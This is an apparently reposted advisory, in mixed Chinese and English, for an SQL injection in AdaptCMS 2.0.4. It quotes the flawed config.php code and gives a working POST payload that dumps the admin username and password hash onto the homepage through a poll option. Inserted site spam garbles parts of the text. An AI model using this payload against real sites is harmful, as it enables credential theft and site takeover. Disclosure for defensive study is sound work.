题目: AdaptCMS <= 2.0.4 SQL Injection vulnerability 作者: Kallimero 官网 http://HdhCmsTestadaptcms测试数据/ 下载 地址 http://HdhCmsTestinsanevisions测试数据/page/3/Downloads/ 影响版本: 2.0.4 测试系统: Debian 介绍 ============ As you know, I love fun and tricky SQL injections. AdaptCMS is vulnerable to a really unusual one. 缺陷 ======== First let's see the code : ---------------[config.php]--------------- Line 34 : array_map('clean', $_POST); ---------------[config.php]--------------- clean() acts like addslashes. But a couple of lines after: ---------------[config.php]--------------- ligne 111: HdhCmsTest2cto测试数据 mysql_query("INSERT INTO ".$pre."polls VALUES (null, '". html entities(check($vote[2]))."', '".$vote2."', 'custom_option', '', '".htmlentities(urldecode($_POST['question']))."', 1, '".time()."')"); ---------------[config.php]--------------- w00t an SQL injection. $_POST['question'] is urldecoded after the superglobal's clean. That's why we can easily inject our SQL request. (Without ENT_QUOTES, the simple quote pass through htmlentities() ). 利用测试 ========= Ok, now we have to add a second INSERT query, to insert a custom choice in the poll, which obviously contain the admin creditentials. A simple POST http request such as: article_id=0&poll_id=1&vote=2&custom=1&question=%2527, 1, 1350677660), (null, 0, (select concat(username, 0x3a, password) from adapt_users), 'option', '', 1, 1337, 1349597648 )-- - Now check homepage, and enjoy the admin creditentials. 如何修复: ============ There is many SQL injections in this CMS ($_SERVER vars are vulnerables as well), and others funkies vulnz. changing your cms seems appropriate until they fix thoses issues.
查看更多关于AdaptCMS 2.0.4 SQL注射 - 网站安全 - 自学php的详细内容...